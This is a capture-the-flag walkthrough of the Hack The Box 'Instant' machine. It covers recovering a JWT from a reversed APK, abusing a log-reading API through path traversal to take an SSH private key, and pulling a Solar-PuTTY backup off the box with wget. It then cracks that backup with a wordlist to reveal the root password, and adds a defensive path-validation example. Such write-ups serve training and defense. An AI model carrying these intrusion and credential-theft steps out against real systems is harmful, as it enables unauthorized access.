Instant
Synopsis
Instant is a medium Linux machine created by tahaafarooq. The instant.htb domain serves the APK file. Reversing the APK reveals the subdomains and a JWT token, which is used to read the logs. Abusing the read-logs functionality, we read the id_rsa of the shirohige user. The /opt directory contains a password-protected, encrypted Solar-PuTTY .dat file holding a session and its credentials. Decrypting the file reveals the root password.
Linux
Medium
30
12-10-2024
01-03-2025
Enumeration
Nmap
Starting the nmap scan, we find the ssh and http services running.
nmap -p- -Pn -sC -sV --min-rate=1000 10.10.11.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 09:30 EST
Warning: 10.10.11.37 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.37
Host is up (0.44s latency).
Not shown: 63941 closed tcp ports (conn-refused), 1592 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
|_ 256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
80/tcp open http Apache httpd 2.4.58
Service Info: Host: instant.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.45 seconds
Add instant.htb to the /etc/hosts file.
Web - instant.htb
Instant is a crypto wallet. The website shows the Instant wallet features, and we can download instant.apk.

File - instant.apk
Downloaded instant.apk and reversed it using jadx-gui. It contains the JWT token and the mywalletv1.instant.htb subdomain in the AdminActivities class.

Text searching for .htb, I found another subdomain, swagger-ui.instant.htb.

Add both the mywalletv1 and swagger-ui subdomains to the /etc/hosts file.
Web - swagger-ui.instant.htb
Swagger (software) is a suite of tools for API developers; the project is open-source and licensed under the Apache License 2.0.

Clicking the Authorize button gives us a form to input the Authorization token; adding the previously obtained JWT gives us authorization.

Foothold
Shell - shirohige [ read logs ]
The Logs section contains the API to read and view the logs. It also shows the path to the logs, which are located in /home/shirohige/logs.

Clicking the Try it out button and supplying the path to the id_rsa file instead of the default log path gives us the id_rsa.
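The weakness behind this step is that the log endpoint opens whatever path the client supplies instead of confining it to the logs directory. As an added illustration (not code from the box or from this writeup), the hardened resolver below shows the check such an endpoint needs; LOG_ROOT is taken from the path shown in the Swagger UI, and the sample requests are constructed.

```python
from pathlib import Path

# Directory the Swagger UI shows as the log location (from the page).
LOG_ROOT = Path("/home/shirohige/logs")


def resolve_unsafe(log_root: Path, requested: str) -> Path:
    """Weak pattern: the client-supplied path is used as-is, so any file
    the service account can read (such as ~/.ssh/id_rsa) is exposed."""
    return Path(requested)


def resolve_safe(log_root: Path, requested: str) -> Path:
    """Confine the request strictly inside log_root.

    Joining an absolute path with '/' silently discards log_root, and '..'
    segments or symlinks can step outside it, so the check is made on the
    fully resolved candidate rather than on the raw string.
    """
    if not requested or "\x00" in requested:
        raise ValueError("empty or NUL-containing path")
    root = log_root.resolve(strict=False)
    candidate = (root / requested).resolve(strict=False)
    if root not in candidate.parents:
        raise ValueError(f"path escapes {root}: {requested!r}")
    return candidate


def audit(requests: list[str]) -> dict[str, bool]:
    """Return, for each request string, whether the hardened resolver accepts it."""
    results = {}
    for req in requests:
        try:
            resolve_safe(LOG_ROOT, req)
            results[req] = True
        except ValueError:
            results[req] = False
    return results


# Constructed sample requests: one legitimate log and three escape attempts.
SAMPLE_REQUESTS = [
    "1.log",
    "../.ssh/id_rsa",
    "/home/shirohige/.ssh/id_rsa",
    "2.log\x00.txt",
]

if __name__ == "__main__":
    for req, ok in audit(SAMPLE_REQUESTS).items():
        print(f"{'ALLOW' if ok else 'DENY ':5} {req!r}")
```

The same comparison on the resolved path is what to look for when reviewing any "read file by name" endpoint; a string prefix check on the unresolved input is not enough.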

Copy the id_rsa into a file and clean up the extra spaces and words.
chmod 600 id_rsa
ssh -i id_rsa shirohige@10.10.11.37
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Mon Feb 17 05:42:25 2025 from 10.10.16.25
shirohige@instant:~$
Privilege Escalation
Pillaging - shirohige
Checking the sudo privileges requires the password. The instant.db file is found, which contains some hashes, but they are uncrackable using hashcat and the rockyou.txt wordlist. The /opt/backups directory contains the Solar-PuTTY directory.
shirohige@instant:~$ cd /opt/backups
shirohige@instant:/opt/backups$ ls
Solar-PuTTY
Solar-PuTTY is a free SSH client developed by SolarWinds that allows you to connect to any server or device on your network.
The Solar-PuTTY directory contains the sessions-backup.dat file. The .dat file in Solar-PuTTY stores sessions and credentials in encrypted form.
shirohige@instant:/opt/backups/Solar-PuTTY$ ls
sessions-backup.dat
Shell - root [ .dat file decrypt ]
VoidSec has created a GitHub repository to decrypt Solar-PuTTY .dat files using wordlists and save the result into a file.
The repository contains an .exe file which runs properly on a Windows machine, but I am using a Linux machine and wine32
is giving some errors. ItsWatchMakerr has created a GitHub repository which contains a Python
script to decrypt Solar-PuTTY .dat files, and I will be using this script.
Transferring the sessions-backup.dat file to the local machine
Open the Python http server on the remote machine and download the file using wget on the local machine.
shirohige@instant:/opt/backups/Solar-PuTTY$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.16.9 - - [18/Feb/2025 05:18:08] "GET /sessions-backup.dat HTTP/1.1" 200 -
wget http://10.10.11.37:8000/sessions-backup.dat
--2025-02-18 00:35:14-- http://10.10.11.37:8000/sessions-backup.dat
Connecting to 10.10.11.37:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1100 (1.1K) [application/octet-stream]
Saving to: ‘sessions-backup.dat’
sessions-backup.dat 100%[========================================================================================>] 1.07K 1.25KB/s in 0.9s
2025-02-18 00:35:16 (1.25 KB/s) - ‘sessions-backup.dat’ saved [1100/1100]
Git clone the above repository
git clone https://github.com/ItsWatchMakerr/SolarPuttyCracker.git
Cloning into 'SolarPuttyCracker'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 18 (delta 4), reused 10 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 6.97 KiB | 1.74 MiB/s, done.
Resolving deltas: 100% (4/4), done.
Install the required modules and execute the script
Change directory to SolarPuttyCracker and install the required modules.
cd SolarPuttyCracker
pip3 install -r requirements.txt
Execute the script with the required arguments.
python3 SolarPuttyCracker.py -w /usr/share/wordlists/rockyou.txt -o ../session_restore.txt ../sessions-backup.dat
____ __ ___ __ __ _____ __
/ __/___ / /___ _ ____ / _ \ __ __ / /_ / /_ __ __ / ___/____ ___ _ ____ / /__ ___ ____
_\ \ / _ \ / // _ `// __/ / ___// // // __// __// // / / /__ / __// _ `// __// '_// -_)/ __/
/___/ \___//_/ \_,_//_/ /_/ \_,_/ \__/ \__/ \_, / \___//_/ \_,_/ \__//_/\_\ \__//_/
/___/
Trying to decrypt using passwords from wordlist...
Decryption successful using password: estrella
[+] DONE Decrypted file is saved in: ../session_restore.txt
The session_restore.txt file contains the root SSH password.
{
"Sessions": [
{
"Id": "066894ee-635c-4578-86d0-d36d4838115b",
"Ip": "10.10.11.37",
"Port": 22,
"ConnectionType": 1,
"SessionName": "Instant",
"Authentication": 0,
"CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
"AuthenticateScript": "00000000-0000-0000-0000-000000000000",
"LastTimeOpen": "0001-01-01T00:00:00",
"OpenCounter": 1,
"SerialLine": null,
"Speed": 0,
"Color": "#FF176998",
"TelnetConnectionWaitSeconds": 1,
"LoggingEnabled": false,
"RemoteDirectory": ""
}
],
"Credentials": [
{
"Id": "452ed919-530e-419b-b721-da76cbe8ed04",
"CredentialsName": "instant-root",
"Username": "root",
"Password": "12**24nzC!r0c%q12",
"PrivateKeyPath": "",
"Passphrase": "",
"PrivateKeyContent": null
}
],
"AuthScript": [],
"Groups": [],
"Tunnels": [],
"LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}
We will use the su command to switch from shirohige to root, because SSH does not work with the above credentials.
shirohige@instant:/opt/backups/Solar-PuTTY$ su root
Password:
root@instant:/opt/backups/Solar-PuTTY# whoami
root
root@instant:/opt/backups/Solar-PuTTY#
Proof of Concept
The video below provides the PoC for the Instant machine.